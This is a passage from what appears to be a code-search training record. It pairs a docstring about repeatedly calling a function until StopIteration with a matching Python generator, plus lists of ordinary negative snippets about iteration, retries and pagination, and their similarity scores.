(number,))\n results = cur.fetchall()\n cur.close()\n return results\n except Exception as e:\n print(e)", "def forever(shard):\n def repeat(*args, **kwargs):\n while True:\n for delay in shard(*args, **kwargs):\n yield delay\n return repeat", "def next(self, x):\n self.next_called_n_times += 1\n return SequentialTaskCollection.next(self, x)", "def repeat(seq, n):\n for e in seq:\n for _ in range(n):\n yield e", "def next ( num = 1 ) :\n return run ( num )", "def test_orm_full_objects_chunks(n):\n\n sess = Session(engine)\n for obj in sess.query(Customer).yield_per(100).limit(n):\n print(obj.name)", "def take_nth(n):\n def _take_nth_xducer(step):\n outer = {\"idx\": 0}\n def _take_nth_step(r=Missing, x=Missing):\n if r is Missing: return step()\n if x is Missing:\n return step(r)\n if outer[\"idx\"] % n:\n outer[\"idx\"] += 1\n return r\n else:\n outer[\"idx\"] += 1\n return step(r, x)\n return _take_nth_step\n return _take_nth_xducer", "def create_n_items(n):\n total_objects = models.Item.objects.all().count()\n for i in range(n):\n models.Item.objects.create(\n name=\"Randomly generated object {}\".format(i+total_objects),\n value=random.random() * 1000000\n )", "def repeat_every(repeats=5, every=2):\n\n def repeat_wrapper(func):\n @functools.wraps(func)\n def func_wrapper(*args, **kwargs):\n for _ in range(repeats):\n value = func(*args, **kwargs)\n if value:\n return value\n time.sleep(every)\n\n return func_wrapper\n\n return repeat_wrapper", "def peek(self, n: int | None = None) -> Any:\n self._fillcache(n)\n if n is None:\n result = self._cache[0]\n else:\n result = [self._cache[i] for i in range(n)]\n return result", "def shake(r, num_repeats=1):\n for i in range(num_repeats):\n r.go(25)\n time.sleep(.1)\n r.stop()\n time.sleep(.1)\n r.go(-25)\n time.sleep(.1)\n r.stop()\n time.sleep(.1)", "def repeat(value: T, times: int) -> List[T]:\n return [value] * times", "def loop(func, n):\n for i in range(n):\n func()", "def nth(n, iterable, default = None):\n return next(islice(iterable, n, None), default)", "def repeatfunc(func, n, *args):\n return starmap(func, repeat(args, n))", "def take(n, seq):\n return itertools.islice(seq, n)", "def fast_forward(self, n):\n self.random(n=n)\n return self", "def repeat_circle(obj, *loop_args):\n # if loop_args == (): # tuple is empty\n if not loop_args: # tuple is empty\n loop_args = (5, 201, 5)\n obj.begin_fill()\n for n in range(loop_args[0], loop_args[1], loop_args[2]):\n obj.circle(n)\n obj.end_fill", "def retry(\n self, n: int, /, *args, error: Catchable = Exception, sleep=None, **kwargs\n ) -> \"fn\":\n\n func = self._mod.retry(n, self, error=error, sleep=sleep)\n return func(*args, **kwargs)", "def acquire(self, n, starting=0, batch_size=None):\n sl = slice(starting, starting+n)\n if self._generate_index < sl.stop:\n self.generate(sl.stop - self._generate_index, batch_size=batch_size)\n return self.get_slice(sl)", "def take(n, iterable):\n return list(islice(iterable, n))", "def take(n, iterable):\n return list(islice(iterable, n))", "def Repeat(dataset, count=None):\n return dataset.repeat(count=count)", "def __getitem__(self, i): #i is index given by the caller\n l_self = len(self)\n if i >= self.times * l_self:\n raise IndexError (\"Circle object goes around %d times\" % (self.times)) #raise IndexError\n return self.data[i % l_self] # return answer", "def take(n):\n def _take_xducer(step):\n outer_vars = {\"counter\": n}\n def _take_step(r=Missing, x=Missing):\n if r is Missing: return step()\n if x is Missing:\n return step(r)\n n = outer_vars[\"counter\"]\n outer_vars[\"counter\"] -= 1\n r = step(r, x) if n > 0 else r\n return ensure_reduced(r) if outer_vars[\"counter\"] <= 0 else r\n return _take_step\n return _take_xducer", "def times(self, fn):\n for i in range(0, self._):\n fn()\n return self", "def next_n(iterator, N):\n try:\n items = []\n for _ in range(N):\n items.append(next(iterator))\n return items\n except StopIteration:\n if items:\n return items\n return None", "def get_random_objects(model=None, queryset=None, count=float('+inf')):\n\n if not queryset:\n try:\n queryset = model.objects.all()\n except AttributeError:\n raise ValueError(\"You must provide a model or a queryset\")\n\n max_ = queryset.aggregate(Max('id'))['id__max']\n i = 0\n while i < count:\n try:\n yield queryset.get(pk=randint(1, max_))\n i += 1\n except queryset.model.DoesNotExist:\n pass", "def repeated(f, n, x):\n if n == 1:\n return f(x)\n else:\n return repeated(f,n-1,f(x))", "def iterate(self,N = None):\n result = self.iterate_loop(N)\n #self.writeToFile()\n\n #TODO: We need a timeout for really long executions, but it won't work because it opens another blender instance! Fix this!\n \"\"\"\n queue = multiprocessing.Queue(1) # Maximum size is 1\n proc = multiprocessing.Process(target=self.iterate_wrapper, args=(self, queue, N))\n proc.start()\n\n # Wait for TIMEOUT seconds\n try:\n result = queue.get(True, TIMEOUT)\n except Queue.Empty:\n # Deal with lack of data somehow\n result = None\n print(\"TIMEOUT reached! The pString is too long!\")\n finally:\n proc.terminate()\n \"\"\"\n return result", "async def repeat(self,ctx, times: int, content='repeating...'):\n for i in range(times):\n await ctx.send(content)", "def nth(iterable, n, default=None):\n return next(islice(iterable, n, None), default)", "def nth(iterable, n, default=None):\n return next(islice(iterable, n, None), default)", "def nth(iterable, n, default=None):\n return next(islice(iterable, n, None), default)", "def repeat_string_n_times(string, count):\r\n return string * int(count)", "def take(n, iterable):\n return list(itertools.islice(iterable, n))", "def take(n, iterable):\n return list(itertools.islice(iterable, n))", "async def repeat(ctx, times: int, content='repeating...'):\n for i in range(times):\n await ctx.send(content)", "def data_repeated(data):\n\n def gen(count):\n for _ in range(count):\n yield data\n\n yield gen", "def _Get(self, count):\n if count > MAXIMUM_RESULTS:\n count = MAXIMUM_RESULTS\n entity_list = self._Next(count)\n while len(entity_list) < count and self.__more_results:\n next_results = self._Next(count - len(entity_list))\n if not next_results:\n break\n entity_list += next_results\n return entity_list;", "def _maybe_repeat(x, n):\n if isinstance(x, list):\n assert len(x) == n\n return x\n else:\n return [x] * n", "def firstn(reader, n):\n\n # TODO(yuyang18): Check if just drop the reader, could clean the opened\n # resource or not?\n\n def firstn_reader():\n for i, item in enumerate(reader()):\n if i == n:\n break\n yield item\n\n return firstn_reader", "def repeat(self, count):\n x = _OSeq()\n for i in range(count):\n x = x.concatenate(self)\n return x", "def get_next(self, limit, offset, count):\r\n if offset + limit >= count:\r\n return None\r\n\r\n return self._generate_uri(limit, offset + limit)", "def bottle_song_while(num):\n pass", "def several(self, times: int):\n return BagOfGoods({g: self[g] * times for g in self.keys()})", "def xrndSphere(n):\n for i in xrange(n):\n yield rndSphere()", "def take(iterable, n):\n return list(itertools.islice(iterable, n))", "def get_last(self, count):", "def repeat(self, count):\n x = HSeq()\n for i in range(count):\n x = x.concatenate(self)\n return x", "async def repeat(ctx, times : int, content='repeating...'):\n for i in range(times):\n await bot.say(content)", "def repeated_iteration(self) -> global___Statement.Iteration.RepeatedIteration:", "def get_first_n_pending_links(self, number):\n try:\n conn = psycopg2.connect(\"dbname='{0}'\".format(DATABASE))\n cur = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)\n cur.execute(\"SELECT link FROM link WHERE chunk_id IS NULL AND state = 'pending' ORDER BY index LIMIT %s;\", (number,))\n results = cur.fetchall()\n cur.close()\n return results\n except Exception as e:\n print(e)", "async def auto_page_coro(coro, *args, **kwargs):\n\n objs = []\n kwargs[\"offset\"] = 0\n kwargs[\"n\"] = 100\n while True:\n response = await coro(*args, **kwargs)\n\n objs += response\n kwargs[\"offset\"] += 100\n\n if len(response) < 100:\n break\n\n return objs", "def retry(num=5):\n s = requests.Session()\n retries = Retry(total=num, backoff_factor=0.1,\n status_forcelist=[500, 502, 503, 504])\n s.mount('http://', HTTPAdapter(max_retries=retries))\n\n return s", "async def repeat(times : int, content='repeating...'):\n for i in range(times):\n await bot.say(content)", "def consume (self, n) :\r\n if (n<0 or n>len(self)) :\r\n m = \"Trying to consume more data than in Circ. Buff\"\r\n raise Exception(m)\r\n \r\n self.empty_ = (n==len(self))\r\n self.nextGet_ = (self.nextGet_+n) % self.capacity()", "def limit(self, max_size):\n return self.__class__(itertools.islice(self, max_size))", "def nth(n):\n\n if n >= 0:\n @sinks\n def _dagpype_internal_fn_act_p(target):\n i = 0\n try:\n while True:\n e = (yield)\n if i == n:\n target.send(e)\n target.close()\n return\n i += 1\n except GeneratorExit:\n target.close()\n\n return _dagpype_internal_fn_act_p\n\n @sinks\n def _dagpype_internal_fn_act_n(target):\n q = collections.deque([], -n)\n try:\n while True:\n q.append((yield))\n except GeneratorExit:\n if len(q) >= -n:\n target.send(q.popleft())\n target.close()\n\n return _dagpype_internal_fn_act_n", "def forever():\n\n def animate(thing):\n thing = list(thing)\n yield from repeat(thing)\n return animate", "def wiggle(r, num_repeats=2):\n for i in range(num_repeats):\n r.go(-10)\n time.sleep(.5)\n r.stop()\n r.go(10)\n time.sleep(.5)\n r.stop()\n for i in range(num_repeats):\n r.go(0, 30)\n time.sleep(2)\n r.stop()\n r.go(0, -30)\n time.sleep(2)\n r.stop()", "def _call_n(x, f, n, *args, **kwargs):\n return [f(i, x, *args, **kwargs) for i in range(n)]", "def repeat_nd(x, reps):\n return RepeatND(reps)(x)", "def stream_n_messages(n):\n response = get_dict(\"url\", \"args\", \"headers\", \"origin\")\n n = min(n, 100)\n\n def generate_stream():\n for i in range(n):\n response[\"id\"] = i\n yield json.dumps(response) + \"\\n\"\n\n return Response(generate_stream(), headers={\"Content-Type\": \"application/json\"})", "def get_next_objectives(self, n=None):\n if n > self.available():\n # !!! This is not quite as specified (see method docs) !!!\n raise IllegalState('not enough elements available in this list')\n else:\n next_list = []\n x = 0\n while x < n:\n try:\n next_list.append(next(self))\n except Exception: # Need to specify exceptions here!\n raise # OperationFailed()\n x = x + 1\n return next_list", "def _fillcache(self, n: int | None) -> None:\n if not n:\n n = 1\n try:\n while len(self._cache) < n:\n self._cache.append(next(self._iterable)) # type: ignore\n except StopIteration:\n while len(self._cache) < n:\n self._cache.append(self.sentinel)", "def takeNGenerator(seq, n):\n\tindex = 0\n\twhile index + n <= len(seq):\n\t\tyield seq[index:index + n]\n\t\tindex = index + 1", "def limit(iterator, n=None):\n for i, v in enumerate(iterator):\n yield v\n if i + 1 == n:\n break", "async def readexactly(self,\n n: int\n ) -> bytes:\n if n < 1:\n return b''\n\n future = asyncio.Future()\n try:\n self._read_queue.put_nowait((future, True, n))\n return await future\n\n except aio.QueueClosedError:\n raise ConnectionError()", "def repeat_value(value: Any = None, repeat_count: int = None) -> ObservableBase:\n from ..operators.observable.repeat import repeat_value\n return repeat_value(value, repeat_count)", "def __next__(self):\n self.idx += 1\n if self.idx >= len(self):\n self.cycles += 1\n self.restart()\n if not self.can_recycle():\n raise StopIteration(f\"Error max cycles have been reached for this GSM object. cycles={self.cycles}\")\n # if self.max_cycles >= 0:\n # if self.cycles >= self.max_cycles:\n # raise StopIteration(f\"Error max cycles have been reached for this GSM object. cycles={self.cycles}\")\n return self.state()", "def nth(iterable, n, next=next, islice=islice, default=None):\n return next(islice(iterable, n, None), default)", "def get_one_item_at_a_time(url, additional_params=None, session=None):\n query_params = {'page': 1, 'per_page': 100}\n query_params.update(additional_params or {})\n req = session or requests\n response = req.get(url, headers=get_headers(), params=query_params)\n response.raise_for_status()\n yield from response.json()\n\n pages_count = get_pages_count(response.links)\n while query_params['page'] < pages_count:\n query_params['page'] += 1\n response = req.get(\n url, headers=get_headers(), params=query_params,\n )\n response.raise_for_status()\n yield from response.json()", "def _get_more(self):\n if not self.alive:\n raise pymongo.errors.InvalidOperation(\n \"Can't call get_more() on a MotorCursor that has been exhausted or killed.\")\n\n self.started = True\n return self._refresh()", "def cycle(obj):\r\n while True:\r\n for item in obj:\r\n yield item", "def repeater(seconds):\n return lambda function: TwistedRepeater(function, seconds)", "def skip(self, n):\n return self.__class__(itertools.islice(self, n, None))", "def count_to(count):\n numbers = [\"one\", \"two\", \"three\", \"four\", \"five\"]\n for number in numbers[:count]:\n yield number", "def take(num, iterable):\n for i, e in enumerate(iterable):\n if i >= num:\n break\n yield e", "def make_parallel(self, n):\n return super().make_parallel(n, True)", "def iterate(iterator, n):\n # throw away n-1 elements\n for index in range(1, n):\n next(iterator, None)\n\n return next(iterator, None)", "def take(n, seq):\n seq = iter(seq)\n result = []\n try:\n for i in range(n):\n result.append(next(seq))\n except StopIteration:\n pass\n return result", "def __init__(self, iterable_input, n=1, name='re-repeat', verbose=True):\n super().__init__(iterable_input=iterable_input, name=name, verbose=verbose)\n self.n = n", "def _fillcache(self, n: int | None) -> None:\n if not n:\n n = 1\n try:\n while len(self._cache) < n:\n self._cache.append(self.modifier(next(self._iterable))) # type: ignore\n except StopIteration:\n while len(self._cache) < n:\n self._cache.append(self.sentinel)" ]
[ "0.6203525", "0.59771645", "0.5969791", "0.5901691", "0.5872414", "0.5850168", "0.58327895", "0.58200485", "0.57241195", "0.5649693", "0.56443447", "0.5643324", "0.56162107", "0.5555079", "0.5550507", "0.5531917", "0.54840827", "0.54764825", "0.5443261", "0.54094815", "0.5397046", "0.5382421", "0.53783256", "0.5375706", "0.5357077", "0.5341014", "0.53331083", "0.5319535", "0.5316214", "0.5314601", "0.5313443", "0.53084964", "0.52992326", "0.5296599", "0.5294995", "0.5291142", "0.5284468", "0.5284468", "0.5267768", "0.5264937", "0.5263421", "0.52609307", "0.5253008", "0.5250111", "0.5234527", "0.5230434", "0.5196677", "0.51896995", "0.51896995", "0.51896995", "0.5180369", "0.51665336", "0.51665336", "0.51654214", "0.5163836", "0.51520205", "0.5149158", "0.5141494", "0.51404476", "0.5133075", "0.5121863", "0.51122105", "0.510719", "0.5105943", "0.5105853", "0.5103782", "0.5089377", "0.50874346", "0.50713634", "0.5066428", "0.50620234", "0.5056194", "0.5052338", "0.50518745", "0.50402945", "0.503887", "0.5035291", "0.50270516", "0.50173515", "0.5013969", "0.501096", "0.50043", "0.50040114", "0.5003617", "0.50014657", "0.49924096", "0.4988643", "0.4988382", "0.49822184", "0.49813116", "0.4981109", "0.49802476", "0.49753124", "0.49724236", "0.49683198", "0.49682963", "0.49589777", "0.49582493", "0.4953386", "0.49529937" ]
0.64713174
0
Make infinite calls to a function with the given arguments. End sequence if func() raises StopIteration.
def repeatedly(func, /, *args, **kwargs): func = to_callable(func) try: while True: yield func(*args, **kwargs) except StopIteration as e: yield from stop_seq(e)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def iterate(func, x):\n while True:\n x = func(x)\n yield x", "def iterate(f, x):\n while True:\n yield x\n x = f(x)", "def iterate(func: Callable[..., T], x: T, *args, index: Index = None):\n func = to_callable(func)\n index = to_index_seq(index)\n\n if index is None and not args:\n out = _iterate(func, x)\n elif index is None:\n out = _iterate_n(func, (x, *args))\n else:\n if not args:\n out = _iterate_indexed(func, index, x)\n else:\n out = _iterate_indexed_n(func, index, (x, *args))\n\n return Iter(out)", "def loop(func):\n def wrapper(*a, **b):\n while True:\n func(*a, **b)\n return wrapper", "def repeat(fun, n):\n for i in range(n):\n yield fun()", "def infinite_loop(func):\n @wraps(func) # Preserve target's metadata\n def wrapper(*args, **kwargs):\n while True:\n try:\n func(*args, **kwargs)\n except KeyboardInterrupt:\n break\n return wrapper", "def iter_sequence_infinite(seq):\n while True:\n for item in seq:\n yield item", "def coroutine(f, *a, **kw):\n i = f(*a, **kw)\n i.next()\n return i", "def iter_except(func, exception):\n try:\n while True:\n yield func()\n except exception:\n pass", "def iter_except(func, exception, first=None):\n try:\n if first is not None:\n yield first()\n while True:\n yield func()\n except exception:\n pass", "def make_func_repeater(f, x):\n\n def repeat(i, x=x):\n if i == 0:\n return x\n else:\n return repeat(i-1, f(x))\n return repeat", "def retryCall(fn, args=None, keywordArgs=None, failureTester=None, sleepManager=None):\n sleepManager = sleepManager or time.SleepManager()\n while True:\n try:\n result = yield fn(*args, **keywordArgs)\n defer.returnValue(result)\n except Exception: # pylint: disable=W0703\n failureTester(failure.Failure())\n yield sleepManager.sleep()", "def RunCoroutineOrFunction(function, args=[]):\r\n if inspect.isgeneratorfunction(function):\r\n coroutine = function(*args)\r\n response = yield coroutine.next()\r\n while True:\r\n response = yield coroutine.send(response)\r\n else:\r\n function(*args)", "def iter_except(function, exception):\n try:\n while True:\n yield function()\n except exception:\n return", "def chained(func):\n def wrapper(*args, **kwargs):\n for xs in func(*args, **kwargs):\n for x in xs:\n yield x\n return wrapper", "def iter_except(function, exception):\r\n try:\r\n while True:\r\n yield function()\r\n except exception:\r\n return", "def unfold(func, seed):\n try:\n elem = func(seed)\n while elem is not None:\n seed, x = elem\n yield x\n elem = func(seed)\n except StopIteration as e:\n yield from stop_seq(e)", "def retrying(func, *retry_args, **retry_kwargs):\n yield retriable(*retry_args, **retry_kwargs)(func)", "def repeat_func(func, *args, **kwargs):\n if kwargs:\n return starmap(lambda args, kwargs: func(*args, **kwargs),\n repeat((args, kwargs))\n )\n else:\n return starmap(func, repeat(args))", "def wrapper_fn(*args, **kwargs):\n\n if __enveloop_number_of_loops__[fn.__name__] > 0:\n __enveloop_number_of_loops__[fn.__name__] -= 1\n return fn(*args, **kwargs)\n else:\n del __enveloop_number_of_loops__[fn.__name__]\n if callback:\n return callback(*args, **kwargs)", "def loop(func, n):\n for i in range(n):\n func()", "def run_with_args(self):\n while True:\n if self.cancelled:\n return\n self.func(self.args)\n time.sleep(self.sleep_time / 1000.00)", "def coroutine(func):\n\n def start(*args, **kwargs):\n cr = func(*args, **kwargs)\n next(cr)\n return cr\n\n return start", "def filtern(func: Callable, iterable: Iterable):\n return next(filter(func, iterable))", "def coroutine(func):\n def start(*args, **kwargs):\n cr = func(*args, **kwargs)\n next(cr)\n return cr\n return start", "def coroutine(func):\n def start(*args, **kwargs):\n cr = func(*args, **kwargs)\n next(cr)\n return cr\n return start", "def coroutine(func):\n def start(*args, **kwargs):\n cr = func(*args, **kwargs)\n next(cr)\n return cr\n return start", "def generator(func):\n\n @fn\n @wraps(func)\n def gen(*args, **kwargs):\n return Iter(func(*args, **kwargs))\n\n return gen", "def call(self, func: Callable[..., T], *args: Any, **kwargs: Any) -> T:\n ret = None\n\n self.before_call(func, *args, **kwargs)\n for listener in self._breaker.listeners:\n listener.before_call(self._breaker, func, *args, **kwargs)\n\n try:\n ret = func(*args, **kwargs)\n if isinstance(ret, types.GeneratorType):\n return self.generator_call(ret)\n\n except BaseException as e:\n self._handle_error(e)\n else:\n self._handle_success()\n return ret", "def interleave(inter, f, seq):\n seq = iter(seq)\n try:\n f(next(seq))\n except StopIteration:\n pass\n else:\n for x in seq:\n inter()\n f(x)", "def _pipe_and_accumulate(val, fns):\n for fn in fns:\n val = fn(val)\n yield val", "def mapping(f):\n @coroutine\n def gen(target):\n while True:\n x = yield\n target.send(f(x))\n return gen", "def repeatfunc(func, times=None, *args):\n if times is None:\n return starmap(func, repeat(args))\n return starmap(func, repeat(args, times))", "def repeatfunc(func, times=None, *args):\n if times is None:\n return starmap(func, repeat(args))\n return starmap(func, repeat(args, times))", "async def concurrently_execute(\n func: Callable[[T], Any],\n args: Iterable[T],\n limit: int,\n delay_cancellation: bool = False,\n) -> None:\n it = iter(args)\n\n async def _concurrently_execute_inner(value: T) -> None:\n try:\n while True:\n await maybe_awaitable(func(value))\n value = next(it)\n except StopIteration:\n pass\n\n # We use `itertools.islice` to handle the case where the number of args is\n # less than the limit, avoiding needlessly spawning unnecessary background\n # tasks.\n if delay_cancellation:\n await yieldable_gather_results_delaying_cancellation(\n _concurrently_execute_inner,\n (value for value in itertools.islice(it, limit)),\n )\n else:\n await yieldable_gather_results(\n _concurrently_execute_inner,\n (value for value in itertools.islice(it, limit)),\n )", "def coroutine(func):\n @wraps(func)\n def primer(*args, **kwargs):\n gen = func(*args, **kwargs)\n next(gen)\n return gen\n return primer", "def scan(func, iterable, start=_EMPTY, *, echo_start=True):\n it = iter(iterable)\n if start is _EMPTY:\n start = next(it)\n if echo_start:\n yield start\n for item in it:\n start = func(start, item)\n yield start", "def repeatfunc(func, n, *args):\n return starmap(func, repeat(args, n))", "def repeatfunc(cls, func, times=None, *args):\n if times is None:\n return starmap(func, repeat(args))\n return starmap(func, repeat(args, times))", "def lift(f: Callable[..., Data]) -> LiftedFunc:\n def inner(*args: Result) -> Result:\n out = []\n for args1 in itertools.product(*args):\n val = f(*args1)\n out.append(val)\n return out\n return inner", "def postorderIterArgs(limit=sys.getrecursionlimit(), testFn=isIterable, *args):\n if limit:\n last = None\n for arg in args:\n if testFn(arg):\n for a in postorderIterArgs(limit - 1, testFn, *arg):\n yield a\n else:\n if last:\n yield last\n last = arg\n if last:\n yield last\n else:\n for arg in args:\n yield arg", "def preorderIterArgs(limit=sys.getrecursionlimit(), testFn=isIterable, *args):\n if limit:\n for arg in args:\n if testFn(arg):\n for a in preorderIterArgs(limit - 1, testFn, *arg):\n yield a\n else:\n yield arg\n else:\n for arg in args:\n yield arg", "def progression(first_item:int, amount:int,func):\n item = first_item\n count = 0\n stop = False\n while count < amount and not stop:\n stop = yield item\n item = func(item)\n count += 1", "def iter_except(cls, func, exception, first=None):\n try:\n if first is not None:\n yield first() # For database APIs needing an initial cast to db.first()\n while True:\n yield func()\n except exception:\n pass", "def run_no_args(self):\n while True:\n if self.cancelled:\n return\n self.func()\n time.sleep(self.sleep_time / 1000.00)", "def _call_n(x, f, n, *args, **kwargs):\n return [f(i, x, *args, **kwargs) for i in range(n)]", "def deferrable(function):\n\n def pseudocore(*args, **kwargs):\n yield function(*args, **kwargs)\n\n return function if isinstance(function, Routine) else routine(pseudocore)", "def _for_each_generator(self,\n func: Callable[..., Any],\n *args: Iterable[Any]) -> List[Any]:\n return [func(gen, *args_for_func) for gen, args_for_func in zip(\n self._generators, zip(*args))]", "def Continuous(forever=True):\r\n def wrap(func):\r\n def wrapped(*args, **kwargs):\r\n rslt = None\r\n rslt = func(*args, **kwargs)\r\n while forever:\r\n rslt = func(*args, **kwargs)\r\n return rslt\r\n wrapped.__name__ = func.__name__\r\n wrapped.__doc__ = func.__doc__\r\n wrapped.__dict__.update(func.__dict__)\r\n return wrapped\r\n return wrap", "def wrap_generator(func):\n\n async def _wrapped(*a, **k):\n r, ret = None, []\n gen = func(*a, **k)\n while True:\n try:\n item = gen.send(r)\n except StopIteration:\n break\n if inspect.isawaitable(item):\n r = await item\n else:\n r = item\n ret.append(r)\n\n if len(ret) == 1:\n return ret.pop()\n return ret\n\n return _wrapped", "def fib():\n x, y = 0, 1\n while True:\n yield x\n x, y = y, x + y", "def __call__(self, func):\n timeouts = _exponential_timeout_generator(\n self._initial, self._maximum, self._multiplier, self._deadline)\n\n @general_helpers.wraps(func)\n def func_with_timeout(*args, **kwargs):\n \"\"\"Wrapped function that adds timeout.\"\"\"\n kwargs['timeout'] = next(timeouts)\n return func(*args, **kwargs)\n\n return func_with_timeout", "def wrapped_fn(*args, **kwargs):\n for delay in delays():\n try:\n return fn(*args, **kwargs)\n except Exception as e: # pylint: disable=broad-except)\n if is_retriable is None:\n continue\n\n if is_retriable(e):\n time.sleep(delay)\n else:\n raise\n return fn(*args, **kwargs)", "def parallelizer(func, arg=False):\n if arg:\n func(arg)\n else:\n func()", "def _fold_loop(cls, f, agg, next):\n\n while next is not None:\n (val, next) = next\n agg = f(val, agg)\n return agg", "def fibonacci(a, b, limit=None):\n loop_indefinitely = limit is None\n while loop_indefinitely or b < limit:\n yield b\n a, b = b, a + b", "def consumer(func):\n\n from functools import wraps\n\n @wraps(func)\n def wrapper(*args,**kw):\n gen = func(*args, **kw)\n gen.next()\n return gen\n return wrapper", "def scanr(func, start, itr):\n if not callable(func):\n raise TypeError(\"First argument to scanr must be callable\")\n itr = iter(itr)\n \n return _scanr(func, start, itr)", "def ex(self, fn, *args, **kwargs):\n if len(args) == 0 and len(kwargs) == 0:\n self.down_queue.put(fn)\n else:\n\n def closure():\n return fn(*args, **kwargs)\n\n self.down_queue.put(closure)", "def fibonacci(multiplier, limit):\n def func():\n if multiplier < 0:\n raise ValueError('multiplier must be non-negative')\n\n if limit < 0:\n raise ValueError('limit must be non-negative')\n\n a, b = 0, 1\n for _ in range(limit):\n a, b = b, a + b\n yield a * multiplier\n\n return func", "def fib(limit):\n a, b = 0, 1\n while a <= limit:\n yield a\n a, b = b, a + b", "def scanl(func, start, itr):\n if not callable(func):\n raise TypeError(\"First argument to scanl must be callable\")\n itr = iter(itr)\n\n return _scanl(func, start, itr)", "def receive_fn(fn: Callable):\n\n global __enveloop_number_of_loops__\n\n __enveloop_number_of_loops__[fn.__name__] = number_of_loops\n\n @functools.wraps(fn)\n def wrapper_fn(*args, **kwargs):\n \"\"\"Function that does the actual wrapping.\n :param args:\n :param kwargs:\n :return: function response\n \"\"\"\n\n if __enveloop_number_of_loops__[fn.__name__] > 0:\n __enveloop_number_of_loops__[fn.__name__] -= 1\n return fn(*args, **kwargs)\n else:\n del __enveloop_number_of_loops__[fn.__name__]\n if callback:\n return callback(*args, **kwargs)\n\n return wrapper_fn", "def coroutine(func):\n def start(*args,**kwargs):\n coro = func(*args,**kwargs)\n coro.next()\n return coro\n return start", "def threadsafe_generator(f):\n\tdef g(*a, **kw):\n\t\treturn threadsafe_iter(f(*a, **kw))\n\treturn g", "def forever(iterable):\n it = iter(iterable)\n while True:\n try:\n yield next(it)\n except Exception as e:\n print(e)\n it = iter(iterable)", "def __call__(self, func, *args):\n\n def wrapped_func(*args, **kwargs):\n\n count = 0\n while True:\n response = func(*args, **kwargs)\n if response.status_code in range(200, 300):\n return response\n elif response.status_code >= 500:\n if count == self.retry_count:\n return response\n else:\n time.sleep(pow(2, count))\n count += 1\n continue\n else:\n return response\n\n return wrapped_func", "def intercept(iterable, function):\n\n def intercepting(iterable_):\n for item in iterable_:\n function(item)\n yield item\n\n return intercepting(iterable)", "def cotakewhile(function, iterator):\n results = []\n\n def checkTake(shouldTake, item):\n if shouldTake == True:\n results.append(item)\n return item\n\n def dotake(item):\n d = maybeDeferred(function, item)\n d.addCallback(checkTake, item)\n return d\n\n def dostop(takeResult):\n return takeResult is None\n\n cfc = _CoFunCaller(resultCollector=dotake, stopFunction=dostop)\n return cfc.coiterate(iterator).addCallback(lambda _: results)", "def stop(x=None):\n raise StopIteration(x)", "def threadsafe_generator(f):\n\n def g(*a, **kw):\n return ThreadsafeIter(f(*a, **kw))\n\n return g", "def wait_for(predicate_func, **kwargs):\n if len(kwargs) == 0:\n while not predicate_func():\n pass\n else:\n while not predicate_func(**kwargs):\n pass", "def foreach(func, iterable):\n\n\tfor x in iterable:\n\t\tfunc(x)", "def __call__(self, input=None): # pragma: no cover\n while False:\n yield None", "def call_async(self, func, *args: Any, **kwargs: Any): # type: ignore[no-untyped-def]\n\n @gen.coroutine\n def wrapped(): # type: ignore[no-untyped-def]\n ret = None\n\n self.before_call(func, *args, **kwargs)\n for listener in self._breaker.listeners:\n listener.before_call(self._breaker, func, *args, **kwargs)\n\n try:\n ret = yield func(*args, **kwargs)\n if isinstance(ret, types.GeneratorType):\n raise gen.Return(self.generator_call(ret))\n\n except BaseException as e:\n self._handle_error(e)\n else:\n self._handle_success()\n raise gen.Return(ret)\n\n return wrapped()", "def do(self, function, args):\n self.continue_event.clear()\n function(*args)\n self.continue_event.wait()", "def infinite_increment():\n i = 0\n while 1:\n yield i\n i += 1", "def run(self, func, *args, **kwargs):\n try:\n ret = func(*args, **kwargs)\n\n if not self._should_handle_return(ret, *args, **kwargs):\n return ret\n except Exception as e:\n if not self._should_handle_error(e, *args, **kwargs):\n raise\n\n if self._on_delay is None:\n raise MaxRetryError('Maximum number of retries exceeded for {0}'.format(self._get_func_name(func)))\n\n retries = 0\n for delay in self._get_delay_sequence(*args, **kwargs):\n retries += 1\n\n if self._should_handle_retry(False):\n self._call_with_sig(self._on_retry, self._sig_retry, (delay, retries), *args, **kwargs)\n\n sleep(delay / 1000)\n\n if self._should_handle_retry(True):\n self._call_with_sig(self._on_retry, self._sig_retry, (delay, retries), *args, **kwargs)\n\n try:\n ret = func(*args, **kwargs)\n\n if not self._should_handle_return(ret, *args, **kwargs):\n return ret\n except Exception as e:\n if not self._should_handle_error(e, *args, **kwargs):\n raise\n\n raise MaxRetryError('Maximum number of retries exceeded for {0}'.format(self._get_func_name(func)))", "def process_list(_func, iterator, *args, **kwargs):\n return [_func(i, *args, **kwargs) for i in iterator]", "def sequence_side_effect(*args):\n seq = list(args)\n\n def rv_fun(*args, **kw):\n return seq.pop(0)\n return rv_fun", "def next ( num = 1 ) :\n return run ( num )", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def threadsafe_generator(f):\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n return g", "def forever():\n\n def animate(thing):\n thing = list(thing)\n yield from repeat(thing)\n return animate", "def threadsafe_generator(f):\n\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n\n return g", "def call_repeatedly(interval, function, args):\n stopped = threading.Event()\n\n def loop():\n while not stopped.wait(interval):\n function(**args)\n\n threading.Thread(target=loop).start()\n\n # return the thread closing handle\n return stopped.set", "def eager_map(func, iterable):\n for _ in map(func, iterable):\n continue", "def page(fn, args, cursor_key='max_id', get_cursor=lambda r: r.get('next_max_id'), wait=5):\n results = fn(**args)\n yield results\n\n cursor = get_cursor(results)\n while cursor:\n if wait:\n time.sleep(wait)\n args[cursor_key] = cursor\n results = fn(**args)\n yield results\n cursor = get_cursor(results)", "def 